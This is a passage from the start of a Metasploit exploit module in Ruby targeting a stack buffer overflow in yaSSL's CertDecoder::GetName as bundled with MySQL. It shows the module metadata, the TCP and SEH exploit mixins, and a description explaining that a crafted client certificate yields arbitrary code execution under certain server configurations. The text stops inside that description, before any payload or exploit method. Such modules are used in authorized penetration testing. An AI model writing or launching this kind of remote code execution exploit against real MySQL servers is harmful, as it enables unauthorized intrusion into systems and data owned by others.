##
# $Id: mysql_yassl_getname.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)
implementation bundled with MySQL. By sending a specially crafted
client certificate, an attacker can execute arbitrary code.
This vulnerability is present within the CertDecoder::GetName function inside
"taocrypt/src/asn.cpp". However, the stack buffer that is written to exists
within a parent function's stack frame.
NOTE: This vulnerability requires a non-default configuration. First, the attacker
must be able to pass the host-based authentication. Next, the server must be
configured to listen on an accessible network interface. Lastly, the server
must have been manually configured to use